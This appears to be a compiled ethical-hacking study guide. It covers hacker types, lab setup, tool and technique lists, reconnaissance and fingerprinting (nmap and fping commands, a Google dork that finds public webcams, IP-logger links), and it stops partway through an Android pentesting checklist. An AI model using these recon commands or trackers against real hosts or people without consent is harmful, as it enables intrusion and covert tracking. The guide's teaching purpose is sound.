Introduction to Ethical Hacking

Introduction to Cybersecurity

Ethical Hacker Career Roadmap

Hacker Lab and Environment setup

Learning Objectives

• Ethical Hacking Basics

• Types of Hackers

• Lab Setup for Ethical Hacking

• Hacker's Team Membership

• Freelancing in Cybersecurity

  • Vulnerability Scoring Systems and Databases

• Want to Become an Ethical Hacker?

• Some Very Common Hacking Tools

  • Common Hacking Techniques

• Hacking Devices

• Hacker Lab Setup

introducing to Ethical hacking

Certified Ethical Hacker A to Z for self learner.

https://www.tutorialspoint.com/ethical_hacking/ethical_hacking_reconnaissance.htm

An ethical hacker, also known as a white-hat hacker, is a cybersecurity professional who legally and ethically attempts to penetrate computer systems, networks, and applications to identify and fix security vulnerabilities. They use their skills to strengthen security measures, protect against malicious hackers, and help organizations safeguard their digital assets. Ethical hackers often perform activities such as penetration testing, vulnerability assessments, and security audits to enhance cybersecurity. Their work plays a crucial role in maintaining the integrity and confidentiality of digital information.

Types of Hackers

Hackers can be categorized into several types based on their intent and activities. Understanding these hacker types is crucial for maintaining cybersecurity and protecting digital assets. Here are some common types of hackers:

1. Black Hat Hackers

• Intent: Malicious and illegal activities, such as unauthorized system breaches, data theft, or causing harm.
• Actions: Engage in criminal hacking with the goal of personal gain or damage.

2. White Hat Hackers

• Intent: Ethical hackers who legally identify and fix security vulnerabilities to enhance cybersecurity.
• Actions: Hired by organizations to strengthen security defenses through activities like penetration testing.

3. Grey Hat Hackers

• Intent: Activities fall between black-hat and white-hat hackers, often without explicit authorization.
• Actions: May disclose vulnerabilities they find but operate in a legally ambiguous space.

4. Hacktivists

• Intent: Use hacking skills to promote political or social causes.
• Actions: Target organizations or individuals they believe act against their causes, with actions often straddling legality.

5. Script Kiddies

• Intent: Limited technical skills, relying on pre-written scripts or tools.
• Actions: Often engage in illegal activities without a deep understanding of hacking.

6. State-Sponsored Hackers

• Intent: Employed or supported by governments for cyber espionage or cyber warfare.
• Actions: Operate on behalf of a nation-state, with potentially significant geopolitical consequences.

7. Phreakers

• Intent: Manipulate and exploit telecommunications systems, especially for unauthorized access or free calls.

8. Cybercriminals

• Intent: Engage in criminal activities for financial gain.
• Actions: Steal data, launch ransomware attacks, commit fraud, or engage in other illegal online activities.

9. Red Teamers

• Role: Simulate cyberattacks on organizations to assess and enhance their security posture.
• Actions: Work alongside blue teamers who defend against these simulated attacks.

10. Bug Bounty Hunters

• Role: Actively search for and report security vulnerabilities in software or websites.
• Actions: Do this legally and often receive rewards or bounties for their findings.

Understanding the motivations and actions of these hacker types is essential for developing effective cybersecurity strategies and protecting digital environments.

Lab Setup for Ethical Hacking

Setting up a dedicated lab environment for ethical hacking is essential for practicing and honing your skills without risking real systems. Here's a step-by-step guide on how to set up your ethical hacking lab:

Hardware and Software

• Hardware: Ensure you have a powerful computer with sufficient RAM and storage to run virtual machines (VMs).

• Virtualization Software: Install virtualization software like VMware Workstation or Oracle VirtualBox to create and manage VMs.

• Operating Systems: Set up various operating systems, including Windows, Linux (e.g., Kali Linux, Ubuntu), and vulnerable systems (e.g., Metasploitable).

Network Configuration

• Virtual Network: Create a virtual network within your virtualization software to isolate your lab environment from your production network.

• Router and Firewall: Use software routers or firewall VMs to simulate network configurations and segmentation.

Lab Components

• Kali Linux: Install Kali Linux as your primary ethical hacking operating system, preloaded with a variety of hacking tools.

• Metasploitable: Use Metasploitable VMs to practice exploiting vulnerabilities and running penetration tests.

• Web Applications: Set up vulnerable web applications like DVWA (Damn Vulnerable Web Application) or OWASP WebGoat.

• Capture The Flag (CTF) Challenges: Find and install CTF challenges and platforms to practice various hacking skills.

Networking Tools

• Use tools like Wireshark for network packet analysis.

• Set up a DNS server to practice DNS-related attacks.

Security Tools

• Install and configure intrusion detection systems (IDS) and intrusion prevention systems (IPS).

• Use vulnerability scanning tools like Nessus or OpenVAS to identify weaknesses in your lab environment.

Practice Safe Practices

• Always operate within the bounds of the law and obtain proper permissions before attempting any penetration tests on real systems.

• Keep all software and systems in your lab up to date with security patches.

• Maintain regular backups of your lab VMs and configurations.

Documentation

• Keep detailed notes and documentation of your lab setup, configurations, and findings. This is crucial for learning and reference.

Continuous Learning

• Stay updated with the latest ethical hacking techniques, tools, and methodologies. Join online forums, communities, and attend training courses.

Legal and Ethical Considerations

• Understand the legal and ethical responsibilities of ethical hacking. Never attempt any activities without proper authorization and consent.

Security

• Ensure that your lab environment is properly secured. Change default passwords, use strong authentication, and restrict access to your lab.

By following these steps, you can create a safe and effective environment for practicing ethical hacking techniques and improving your cybersecurity skills responsibly.

Hacker's Team Membership

If you're exploring the world of hacking and cybersecurity, you may encounter various team memberships, each with its own roles and responsibilities. Here's a list of common hacker team memberships:

1. Programmer

• Skilled in coding and scripting, often used to develop tools and scripts for hacking.

2. Cracker

• Focuses on breaking software protections, such as cracking software licenses or copy protection.

3. Defacer

• Specializes in altering the appearance of websites by replacing their content with their own messages.

4. Carder

• Engages in credit card fraud and unauthorized financial transactions.

5. Bug Hunter

• Searches for and reports software vulnerabilities to help improve security.

6. CTF Player (Capture The Flag)

• Enjoys solving hacking challenges and puzzles in Capture The Flag competitions.

7. Spammer

• Sends unsolicited emails or messages in large volumes, often for malicious purposes.

8. Black Hat

• Engages in malicious and illegal hacking activities with criminal intent.

9. White Hat

• Ethical hacker who legally identifies and fixes security vulnerabilities to enhance cybersecurity.

10. Gray Hat

• Operates in a morally ambiguous space, conducting hacking activities without explicit authorization but without malicious intent.

11. Developer

• Creates software and tools, often used by hackers to automate tasks or exploit vulnerabilities.

12. Beta Crew

• Testers who evaluate new hacking tools and techniques before wider release.

13. Crew Member

• A member of a hacking group or crew.

14. Zone Admin

• Manages specific areas or zones on a network, often responsible for security.

15. Admin

• Has administrative privileges, often within a hacker forum or system.

16. CEO (Chief Executive Officer)

• The leader or top authority figure within a hacking group or organization.

These team memberships reflect the diverse roles and responsibilities within the world of hacking and cybersecurity. Keep in mind that ethical considerations and legal boundaries should always be respected in any hacking activity.

Freelancing in Cybersecurity

If you're passionate about cybersecurity and want to work independently, freelancing can be a rewarding career option. Here are some remote job roles and opportunities in the field:

1. Ethical Hacker

• Role: Ethical hackers, also known as white-hat hackers, use their skills to identify and fix security vulnerabilities.
• Freelancing Opportunity: Offer your services to organizations looking to assess and enhance their cybersecurity.

2. White Hat Hacker

• Role: Similar to ethical hackers, white-hat hackers focus on security testing and vulnerability assessment.
• Freelancing Opportunity: Provide penetration testing and security consulting services to clients remotely.

3. Cybersecurity Expert/Specialist

• Role: Cybersecurity experts are well-versed in various aspects of cybersecurity, from threat analysis to risk management.
• Freelancing Opportunity: Offer expertise in cybersecurity strategy and implementation to businesses seeking protection.

4. Bug Bounty Hunter

• Role: Bug bounty hunters actively seek and report security vulnerabilities in software and websites.
• Freelancing Opportunity: Participate in bug bounty programs offered by companies and platforms, earning rewards for finding and responsibly disclosing vulnerabilities.

5. Pentester (Penetration Tester)

• Role: Pentesters simulate cyberattacks to identify weaknesses in a system's defenses.
• Freelancing Opportunity: Freelance pentesters are in demand for assessing and securing networks, applications, and websites.

Explore these freelance opportunities in cybersecurity to leverage your skills and help organizations strengthen their digital defenses while enjoying the flexibility of remote work.

Vulnerability Scoring Systems and Databases

In the field of cybersecurity, vulnerability scoring systems and databases play a crucial role in identifying, categorizing, and prioritizing security vulnerabilities. Here are some prominent ones:

Common Vulnerability Scoring System (CVSS)

• Description: CVSS is a standardized system for assessing the severity and potential impact of security vulnerabilities.
• Use: It assigns a numeric score to vulnerabilities, helping organizations prioritize and address them based on their criticality.
• Website: CVSS Official Website

Common Vulnerabilities and Exposures (CVE)

• Description: CVE is a dictionary of publicly known information security vulnerabilities and exposures.
• Use: Each CVE entry provides a unique identifier for a vulnerability, making it easier to track and reference vulnerabilities across the cybersecurity community.
• Website: CVE Official Website

National Vulnerability Database (NVD)

• Description: NVD is the U.S. government repository of standards-based vulnerability management data.
• Use: It provides a comprehensive database of vulnerabilities, including CVSS scores, making it a valuable resource for security professionals.
• Website: NVD Official Website

Common Weakness Enumeration (CWE)

• Description: CWE is a community-developed list of common software weaknesses.
• Use: It helps identify vulnerabilities and design flaws in software by providing a standardized language for discussing security weaknesses.
• Website: CWE Official Website

These vulnerability scoring systems and databases are essential tools for cybersecurity professionals and organizations to stay informed about vulnerabilities, assess their severity, and take appropriate measures to secure their systems and data.

Want to Become an Ethical Hacker?

একজন হ্যাকারের যা জানা থাকা দরকার

If you aspire to become an ethical hacker, there are essential skills and knowledge areas you need to focus on:

1. Programming is Important!

   • Programming languages like Python, JavaScript, and C/C++ are essential for creating tools, scripts, and understanding the inner workings of software.

2. Have a Hacker's Mindset

   • Think like a hacker by exploring systems, seeking vulnerabilities, and understanding how things can be exploited.

3. Be Verbose, But Don't Talk Much

   • Effective communication is crucial. Document your findings and share them with your team, but avoid revealing too much publicly.

4. Logical Thinking

   • Develop strong problem-solving skills and the ability to think logically to uncover vulnerabilities and devise secure solutions.

5. Don't Learn It All, But Know It All

   • Cybersecurity is a vast field. Focus on mastering specific areas like network security, web application security, or penetration testing.

6. Computer Basics: Hardware, Software, Processing Methodology

   • Understand the fundamentals of computer hardware, software, and how data processing works.

7. Web and Internet

   • Learn about protocols like HTTP, DNS, Web Servers, FTP, and SMTP to understand web technologies and potential attack vectors.

8. Networking

   • Master TCP/IP, ARP, network devices, types of networks, and routing and switching concepts for comprehensive network security.

9. Operating Systems

   • Familiarize yourself with various operating systems, including Linux distributions (e.g., Kali, Parrot, Red Hat), Windows, Android, iOS, and macOS.

Embarking on a journey to become an ethical hacker requires dedication and continuous learning. Start with the basics, build a strong foundation, and gradually specialize in areas that align with your interests and career goals.

Remember that ethical hacking is about safeguarding systems and data, so always prioritize ethical conduct and respect legal boundaries in your cybersecurity endeavors.

Some Very Common Hacking Tools

Here are some widely used hacking tools that security professionals and ethical hackers employ for various cybersecurity tasks:

1. Nessus Vulnerability Scanner

   • A network vulnerability scanner that detects security flaws in a wide range of systems and applications.

2. Kismet

   • A wireless network analyzer that monitors wireless network traffic to identify potential security issues.

3. John The Ripper

   • A password cracking tool capable of cracking Unix, Windows, and encrypted passwords.

4. Unicornscan

   • A fast and lightweight network scanner that identifies open ports, service versions, and network information.

5. Netsparker

   • A web application vulnerability scanner used to identify vulnerabilities in websites and web applications.

6. Burp Suite

   • A comprehensive web application security testing tool, including scanning, crawling, and application attack testing.

7. Sqlmap

   • Detects and exploits SQL injection vulnerabilities in web applications.

8. Nikto Website Vulnerability Scanner

   • Scans web servers for vulnerabilities and security issues.

9. SuperScan

   • A powerful network scanner that detects open ports, vulnerabilities, and network information.

10. Metasploit

    • A penetration testing framework for identifying and exploiting vulnerabilities in various systems and applications.

11. Nmap

    • A comprehensive network scanner that identifies open ports, vulnerabilities, and network information.

12. Aircrack-ng

    • Used to crack Wi-Fi network authentication keys.

13. Acunetix

    • A web application security scanner that identifies vulnerabilities and security issues in websites and web applications.

14. Wireshark

    • A network protocol analyzer for troubleshooting network issues and detecting security threats.

15. Hashcat

    • A password cracking tool supporting a wide range of password types and hash algorithms.

16. Maltego

    • Software for open-source intelligence and forensic analysis of threat actors.

17. Social-Engineer Toolkit

    • Used for performing social engineering attacks, such as phishing and spear-phishing.

These tools are essential for cybersecurity professionals to identify vulnerabilities, assess security risks, and enhance the overall security posture of systems and networks.

Common Hacking Techniques

In the world of cybersecurity, understanding common hacking techniques is essential for identifying vulnerabilities and protecting against cyber threats. Here are some widely used hacking techniques:

1. Phishing

   • Description: Trick users into revealing sensitive information (e.g., passwords, credit card details) by posing as a trustworthy entity in electronic communication.

2. Malware

   • Description: Software designed to gain unauthorized access or cause damage to a computer system.

3. Keylogger

   • Description: Malware that records keystrokes, potentially stealing sensitive information like passwords and credit card numbers.

4. Cross-Site Scripting (XSS)

   • Description: Exploits vulnerabilities in web applications to inject malicious code into web pages, compromising user data and server security.

5. SQL Injection (SQLi)

   • Description: Exploits database vulnerabilities in web applications, allowing attackers to inject SQL commands and steal sensitive data.

6. Denial of Service (DoS) / Distributed Denial of Service (DDoS) Attacks

   • Description: Overwhelm a system or network to make it unavailable to users, often by flooding it with traffic.

7. Social Engineering

   • Description: Manipulating individuals to divulge sensitive information, data, or access to a system or network.

8. Card Skimming

   • Description: Installing discreet devices on ATMs to steal card data when users insert or swipe their cards.

9. ATM Hacking

   • Description: Exploiting vulnerabilities or using hardware hacks to gain unauthorized access to ATMs, stealing card data and PINs.

10. System Hacking

    • Description: Exploiting vulnerabilities in operating systems or applications to gain unauthorized access, steal data, or perform malicious actions.

11. Web Server Hacking

    • Description: Exploiting vulnerabilities in web servers to gain unauthorized access, steal data, or carry out other malicious activities.

12. Cryptography

    • Description: Securing communication by converting data into an unreadable format that can't be easily intercepted or understood by unauthorized persons.

13. Sniffing

    • Description: Intercepting and monitoring network traffic to steal sensitive data, such as passwords and other transmitted information.

14. Session Hijacking

    • Description: Taking control of an active user session in a web application, allowing attackers to access restricted areas, steal data, or perform fraudulent actions.

Understanding these hacking techniques is crucial for safeguarding systems, networks, and sensitive data against cyber threats and attacks.

Hacking Devices

In the realm of cybersecurity, various hacking devices are employed for research, penetration testing, and security analysis. These devices have diverse applications, from identifying vulnerabilities to testing system resilience. Here are some notable hacking devices:

1. USB Rubber Ducky

   • Description: A small USB device for automated keystroke injection attacks. It emulates a keyboard and executes programmed sequences of commands.

2. Raspberry Pi

   • Description: A low-cost, versatile, credit card-sized computer used for penetration testing, network monitoring, and data privacy.

3. HackRF One

   • Description: An open-source software-defined radio platform that enables analysis and emulation of various wireless protocols like Bluetooth, FM radio, and GSM.

4. USB Killer

   • Description: A malicious USB device that delivers a high-voltage electrical surge to test the durability and security of electrical devices.

5. Proxmark3 Kit

   • Description: A tool for RFID research and attacks, capable of interacting with, reading, and cloning RFID cards and tags.

6. WiFi Pineapple

   • Description: A device for wireless penetration testing and reconnaissance, used to create fake Wi-Fi access points, collect client-side information, and perform man-in-the-middle attacks.

7. Hardware Keylogger

   • Description: A small device attached to a keyboard to record keystrokes. Useful for monitoring user activity and security testing.

8. Alfa Network Board

   • Description: A wireless network adapter for wireless penetration testing, network analysis, and reconnaissance, often used to capture packets and perform wireless attacks.

These hacking devices are indispensable tools for cybersecurity professionals, penetration testers, and researchers. They enable comprehensive assessments and analysis of systems, networks, and components to uncover vulnerabilities and weaknesses. It's crucial to use them responsibly, respecting privacy and safety considerations.

Hacker Lab Setup

Setting up a hacker lab with virtual machines allows you to experiment with different operating systems and software without risking your primary environment. Here's a guide on enabling virtualization and downloading essential tools for your hacker lab.

Enable Virtualization in Windows 10

• Virtualization allows you to run virtual machines (VMs).
• To enable it, access your BIOS/UEFI settings, look for Virtualization, and enable it.
• Confirm that your CPU supports virtualization technology.

Download Virtualization Software

1. VMware

   • Download VMware

2. VirtualBox

   • Download VirtualBox

For Mac Users

• You can use VMware or VirtualBox to set up virtual machines on macOS.

Download Kali Linux (VMware / VirtualBox)

• Kali Linux Download

Download Parrot OS

• Parrot Security Download

How to Install Parrot OS on VMware

• Watch Installation Tutorial

Windows OS

Windows Sandbox

• Enable Windows Sandbox by following this video tutorial.

Cloud Linux OS

• Explore Linux in the cloud using Google Cloud Shell.

Kali Linux - Online in the Cloud

• Try Kali Linux online using OnWorks.

Android (VMware)

• Download Android-x86 from FossHub or OSBoxes.
• Follow this tutorial for setup.
• Bangla Tutorial is also available.

Android (VirtualBox)

• Download Android-x86 from FossHub or OSBoxes.
• Follow this tutorial for setup.
• Explore Bangla Tutorial if needed.

Android Emulator

• LDPlayer: Download LDPlayer
• Noxplayer: Download Noxplayer
• Gameloop: Download Gameloop

Set up your hacker lab with these tools and enjoy a secure and isolated environment for cybersecurity experimentation.

footprinting and reconnaissance

Learning Objectives

Understanding Footprinting and Reconnaissance in Cybersecurity

Introduction: Footprinting and reconnaissance are fundamental steps in the process of information gathering. They play a crucial role in cybersecurity, ethical hacking, and competitive intelligence by providing valuable insights into a target, be it a network, organization, or individual.

Footprinting: Footprinting marks the initial phase of information gathering. It involves the discreet collection and analysis of data about the target without any direct interaction. The primary goal is to acquire as much relevant information as possible while avoiding detection. Passive techniques, such as examining public sources, social media profiles, domain registrations, DNS records, and web server banners, are used to build a comprehensive profile of the target. Additionally, this phase identifies potential vulnerabilities and areas of interest within the target's infrastructure.

Reconnaissance: Reconnaissance, also known as active information gathering or probing, follows footprinting. This phase involves actively probing the target to gather specific and detailed information. Unlike footprinting, reconnaissance is more intrusive.

It's important to note that while these activities are essential for security professionals to understand and protect against potential threats, they can also be used maliciously by hackers or cybercriminals. Unauthorized or malicious footprinting and reconnaissance activities are illegal and unethical, as they can lead to security breaches, data theft, or other harmful actions. Ethical hacking, also known as penetration testing, involves performing these activities with proper authorization to identify and mitigate security weaknesses.

In summary, footprinting and reconnaissance are crucial phases in information gathering that can be used for both legitimate security purposes and potentially malicious activities, depending on the intent and authorization of the person conducting them.

Reconnaissance in Ethical Hacking

Reconnaissance, also known as Footprinting or Information Gathering, is a crucial stage in ethical hacking that involves gathering information about a target system or network. In this guide, we will explore the various techniques and tools used in reconnaissance to identify vulnerabilities that could be exploited.

Types of Reconnaissance

There are two main types of reconnaissance:

Passive Reconnaissance

Passive reconnaissance involves gathering information without directly interacting with the target system. This can be done through publicly available sources, such as websites and search engines.

Active Reconnaissance

Active reconnaissance involves directly interacting with the target system. This can include techniques such as network scans and vulnerability scans and can raise the risk of detection.

What Ethical Hackers and Pentesters Look For

Ethical hackers and pentesters look for various pieces of information during the reconnaissance phase, including:

• Network Information
  • Domain name
  • Internal Domain
  • IP Address
  • Unmonitored/private websites
  • TCP/UDP Services
  • VPN/IDS/IPS/access controls
  • VPN info
  • Phone numbers/VoIP
  • Network topology
  • Network device
• Operating System Information
  • Users and group names/info
  • Banner grabbing
  • Routing tables
  • SNMP
  • System architecture
  • Remote systems
  • System names
  • Passwords
  • Dumpster diving
  • Version
  • Patch level
• Organization Information
  • Organization website
  • Company directory
  • Employee information
  • Business structure
  • Location details
  • Comments in HTML source code
  • Security policies deployed
  • Webserver links
  • Background of organization
  • Marketing and advertising
  • Prevailing events
  • Partners
  • Phone
  • Financial information

External Network Pentester

External network pentesters focus on evaluating the security of an organization’s external network infrastructure. They look for:

• Whois
• Operating systems and applications
• Publicly accessible information
• Google and Search Engine
• Website Mirroring
• Archive Sites
• Github recon
• Network Information
• Web server Content
• Email Header
• People Sites
• Social Network
• Alert Website

Internal Network Pentester

Internal network penetration testing focuses on evaluating the security of an organization’s internal network infrastructure. They look for:

• IP Address
• Internal DNS
• Private Website
• Dumpster Diving
• Shoulder Surfing

Web Application Pentester

Web application pentesters focus on evaluating the security of an organization’s web applications. They look for:

• Network Information
  • IP address
  • Domain name
  • Network topology
  • Open ports and services
• Web Application Information
  • Web server technology used
  • Application framework
  • Source code (if accessible)
  • Session management
  • Input validation and data handling
  • Authentication and authorization mechanisms
• Web Server Information
  • Operating system
  • Web server software version
  • Server-side scripting language and version
  • Database management system and version
• Web Application Components

  • Dynamic content generation

  • Client-side scripting languages

  • Third-party components and libraries

    

Conclusion

Reconnaissance is an essential stage in ethical hacking that involves gathering information about a target system or network. It helps ethical hackers and pentesters identify vulnerabilities that could be exploited. By understanding the various techniques and tools used in reconnaissance, you can enhance your skills as an ethical hacker or pentester.

Footprinting in Cybersecurity

Footprinting involves gathering information about a target system that can be used to execute a successful cyber attack. To obtain this information, hackers use various methods and tools. This information serves as the initial step for the hacker to exploit a system. There are two types of footprinting:

Active Footprinting

Active footprinting involves direct interaction with the target machine.

Passive Footprinting

Passive footprinting involves collecting information about a system located remotely from the attacker.

Information Gathered Through Footprinting

• The operating system of the target machine
• Firewall information
• IP address
• Network map
• Security configurations of the target machine
• Email IDs and passwords
• Server configurations
• URLs
• VPN details

Sources for Footprinting

1. Social Media: Hackers leverage the tendency of many individuals to share sensitive information online. They may create fake accounts to befriend or follow someone to gather their information.

2. JOB Websites: Organizations often share confidential data on job websites. For example, a job posting mentioning "Job Opening for Lighttpd 2.0 Server Administrator" reveals that an organization uses the Lighttpd web server version 2.0.

3. Google: Search engines like Google can be used for advanced searches, known as "Google hacking." Operators like "inurl," "allinurl," and "filetype" combined with basic search techniques can reveal sensitive information. For example, searching "inurl:ViewerFrame?Mode=" can find public web cameras.

4. Social Engineering: Various techniques fall under this category, including eavesdropping and shoulder surfing, where attackers attempt to record personal information through communication mediums.

5. Archive.org: This website collects snapshots of older website versions, providing information that may no longer exist on the current site.

6. Organization's Website: The organization's website is a prime source for open-source information provided to clients, customers, or the public.

7. Using Neo Trace: NeoTrace is a powerful tool for tracing network paths. It displays the route between the user and the remote site, including intermediate nodes and their information.

8. Whois: This website allows hackers to trace information about domain names, email IDs, domain owners, and more, serving as a valuable tool for website footprinting.

By understanding these techniques and sources, individuals can enhance their knowledge of footprinting in cybersecurity.

Fingerprinting in Ethical Hacking

Fingerprinting refers to the methods used in ethical hacking to determine the operating system running on a remote computer. There are two main types of fingerprinting:

Active Fingerprinting

Active fingerprinting involves sending specially crafted packets to a target machine and analyzing its response to determine the target's operating system. Tools like NMAP can be used for this purpose.

Passive Fingerprinting

Passive fingerprinting relies on sniffer traces from the remote system, such as Wireshark data. By analyzing these traces, you can deduce the operating system of the remote host.

Factors Analyzed for OS Determination

To determine the operating system, four important elements are examined:

• TTL (Time-To-Live) set on outbound packets
• Window Size
• DF (Don't Fragment) bit
• TOS (Type of Service) settings

These factors help in OS identification, although it's not always 100% accurate and may work better for some operating systems than others.

Basic Steps

Before attacking a system, it's crucial to determine the target's operating system. Once known, it's easier to identify potential vulnerabilities for exploitation.

Here's a simple NMAP command to identify the OS and open ports of a website:

nmap -O -v tutorialspoint.com

Port Scanning

Port scanning reveals open ports on a server. For example:

PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 3306/tcp open mysql

Ping Sweep A ping sweep (ICMP sweep) helps find live hosts in a range of IP addresses. For example, using fping:

fping -a -g 192.168.0.1 192.168.0.255

DNS Enumeration

DNS enumeration gathers information about DNS servers and their records. Tools like nslookup and scripts like DNSenum.pl can assist in this process.

Quick fixes and precautions are also discussed to safeguard systems against potential attacks.

These techniques and tools are essential in ethical hacking to gather information about target systems and enhance security.

IP Track

IP Logger:-

• https://iplogger.org/
• https://grabify.link/

IP Locator:-

• https://www.iplocation.net/

Google Map(Location Track)

Latitude & Longitude in Google Maps

• https://www.google.com/maps

Domain (Website Info) >> Part-1

• https://whois.domaintools.com/
• https://domainbigdata.com/

DNS:

• https://smallseotools.com/domain-ip-lookup/
• https://dnsdumpster.com/
• https://www.ultratools.com/tools/dnsLookup
• https://dnschecker.org/ns-lookup.php

Site Hosting Company Info:

• https://smallseotools.com/domain-hosting-checker/
• https://hostingchecker.com

Domain (Website Info) >> Part-2

❑ Reverse Ip

• https://www.yougetsignal.com/tools/web-sites-on-web-server/
• https://hackertarget.com/reverse-ip-lookup/
• https://www.whoishostingthis.com/
• https://smallseotools.com/reverse-ip-lookup/

Which platform used for developing Ping to identify server details (CMS Check)

❑ CMS Check

• https://whatcms.org/
• https://cmsdetect.com/
• https://www.wpthemedetector.com/

Chrome Extension

• https://chrome.google.com/webstore/detail/what-cms-is-this/gamohlpmdjkdjepgdgjohkbfpmeelmem
• https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=en

Which platform used for developing Ping to identify server details (Site BuiltWith) Chrome Extension WhatRuns

• https://chrome.google.com/webstore/detail/whatruns/cmkdbmfndkfgebldhnkbfhlneefdaaip?hl=enBuiltWith

Online Tools

• https://builtwith.com/
• https://sitereport.netcraft.com/
• https://w3techs.com/site

Extra Site Info

Domain Country Checker Alexa, Country Flag Etc Browser Extension

Domain Age Checker

• https://www.duplichecker.com/domain-age-checker.php

  SSL Checker

• https://www.digicert.com/help/

Check Server Status

• https://smallseotools.com/check-server-status/

Website Speed Checker

• https://tools.pingdom.com/
• https://gtmetrix.com/

WEBSITE LINK COUNTER CHECKER

• https://smallseotools.com/website-links-count-checker/

Email Header

Online Tools

• https://mxtoolbox.com/EmailHeaders.aspx
• https://www.whatismyip.com/email-header-analyzer/
• https://chrome.google.com/webstore/detail/email-tracker-for-gmail-m/ndnaehgpjlnokgebbaldlmgkapkpjkkb

Valid Email Address Checker

Online Valid Mail Checker

• https://quickemailverification.com/
• https://network-tools.com/

Valid Mail Verifier Tool

To check mail address valid or invalid

IP Locator Best One

• https://ipinfo.io

Data Breach Checker

• https://breachdirectory.org/
• https://haveibeenpwned.com/

epieos Tools |Email Recon

epieos Tools - Email Checking Tool - Leaks, Google Profiles | OSINT Recon

• https://tools.epieos.com/

Subdomain Enumeration Suite

❑ Sub3 Suite is a research-grade suite of tools for Subdomain Enumeration, OSINT Information gathering & Attack Surface Mapping. Supports both manual and automated analysis on variety of target types with many available features & tools. ❑ Github: 3nock/sub3suite: a free, open source, cross platform Intelligence gathering tool. (github.com)

OSINT Sites List

• Biggest OSINT Sites List

Recon

• GitHub: Reconator

TryHackMe Room

• https://tryhackme.com/room/threatinteltools

Theory

• https://tryhackme.com/room/geolocatingimages
• https://tryhackme.com/room/ohsint
• https://tryhackme.com/room/searchlightosint

Android App Pentesting Checklist

Welcome to the "Android App Penetration Testing Checklist" Repository!

Explore the ultimate companion for Android app penetration testing, meticulously crafted to identify vulnerabilities in network, data, storage, and permissions effortlessly. This repository merges a comprehensive checklist of tasks and cutting-edge techniques, providing security professionals with a robust framework for a thorough security assessment of Android applications.

The checklist covers a range of topics, including:

Static analysis: reviewing the app's source code and resources for potential vulnerabilities

Dynamic analysis: analyzing the app's behavior and interactions with the device and network during runtime

Network analysis: analyzing the app's communication with servers and other external resources over the network

Permission analysis: reviewing the app's requested permissions and assessing whether they are appropriate and secure

Cryptographic analysis: reviewing the app's use of cryptography and ensuring that it is implemented securely

Data storage analysis: analyzing the app's handling of sensitive data, including how it is stored and transmitted

This checklist is intended as a starting point for penetration testers and bug bounty hunters to identify common security issues in Android applications. It is not a comprehensive guide to all possible security issues and should be used in conjunction with other resources and best practices.

Table of Content

• Android Applications Penetration Testing Checklist (v1.1)
• Important Tools
• Tools Installation/Setup
• Prerequisites
  • Hardware requirements
  • Software/Tools prerequisites
    • 1. Java (Jdk)
    • 2. Python/Python3
    • 3. Genymotion
    • 4. Docker
    • 5. Android Debug Bridge (adb)
    • 6. Magisk
• Mobile Security Framework (MobSF)
  • MobSF Installation on Docker
  • MobSF Installation on Physical Machine
• Drozer (on desktop)
• APKLeaks
• Apktool
• APKToolGUI
• JADX
• JD-GUI
• Dex2Jar
• Objection
• Burp Suite
• Postman
• Radare2
• Nuclei
• Zipalign
• DB Browser for SQLite
• Frida Tools
• Frida Server (Magisk-Frida)
• Always Trust User Certs & Burp-cert Magisk Modules
• Fridump
• Useful Commands & Tools Usage
• ADB Commands
• Frida Commands
• Objection Commands
• Drozer Commands
• Terminology's
• SSL Pinning
• KeyStore
• Memory Dump
• Important Links
• Intentionally Vulnerable Applications For Practice

Android Applications Penetration Testing Checklist (v1.1)

NB: This list does not follow the OWASP vulnerability indexing order.

Important Tools

• Mobile Security Framework (MobSF) (Link)
• Runtime Mobile Security (RMS) (Link)
• Pen-Andro (Link)
• Burp Suite (Link)
• Postman (Link) for API's
• Yaazhini (Link)
• House (Link)
• Apktool (Link)
• Easyapktool (Link) Discontinued
• APKToolGUI(New) (Link) Easyapktool Alternative
• Genymotion (Link)
• Frida (Link)
• Magisk (Link)
• Magisk-Frida (Link)
• Frida-tools (Link)
• Drozer (Link)
• Objection (Link)
• JD-GUI (Link)
• JADX (Link)
• Dex2Jar (Link)
• ApkLeaks (Link)
• Fridump (Link)
• Sqlite Browser (Link)
• Radare2 (Link)
• Nuclei (Link)
• XMLStarlet (Link)
• ADB (Link)
• zipalign (Link)

Tools Installation/Setup

[!WARNING] As you explore this repository further, please be aware that certain actions, such as bootloader unlocking, Magisk installation, and rooting techniques, come with inherent risks. Your device's warranty may be voided, and there's a potential for data loss, instability, or even "bricking" your device.
Rooting exposes your device to security risks, and it may no longer receive official updates, leaving it vulnerable. This information is shared for educational purposes only, and I take no responsibility for any damage, data loss, or malfunctions that may occur.
By proceeding, you acknowledge and accept all risks involved, and it is advisable to fully understand the consequences before implementing any changes.

Prerequisites

Hardware requirements

• Windows/Linux (preferred Kali-Linux).
• USB Cable
• An android device with Bootloader unlocked
  • How to unlock Bootloader ? (Link)
• A pen-drive and OTG cable or SD card

Software/Tools prerequisites

Before you start testing Android apps, make sure to install the necessary tools on both your computer (Linux/Windows) and the Android device itself.

1. Java (Jdk) (Link)

• Download Java JDK version 17 or up according to your system(Download Link)
• Install JDK to your system

2. Python/Python3 (Link)

Python3 installation for Debian or Ubuntu based linux distributions:

sudo apt-get update

sudo apt-get -y install python3 python3-pip

Python installation for Windows:

• Download Windows installer of Python from official website (Link)
• Double click the installer
• Check 'Add python.exe to PATH' checkbox
• Click on 'Customize installation'
• Check 'pip' checkbox
• Check 'Python test suite' checkbox
• Check 'py launcher' checkbox
• Check 'for all users (requires admin privileges)' checkbox
• Click next to install python

3. Genymotion (Link)

• Create a free account on Genymotion website
• Follow this official instruction to install Genymotion on Linux. Instruction
• Follow this official instruction to install Genymotion on Windows. Instruction

4. Docker (Link)

Docker installation for Debian or Ubuntu based linux distributions:

sudo apt-get update

sudo apt-get -y install docker.io

systemctl start docker

NB: If you are using other than Debian or Ubuntu based Linux, read this instruction to install docker according to your operating system.

Docker installation for Windows:

• Download Docker Desktop (Link)
• Double click to install

5. Android Debug Bridge (adb) (Link)

adb installation for Debian or Ubuntu based linux distributions:

sudo apt install adb

wget -c https://dl.google.com/android/repository/platform-tools-latest-linux.zip

unzip platform-tools-latest-linux.zip

cd platform-tools

give executable permission

chmod +x ./adb
chmod +x ./fastboot

Check adb working or not

./adb version

adb installation for Windows:

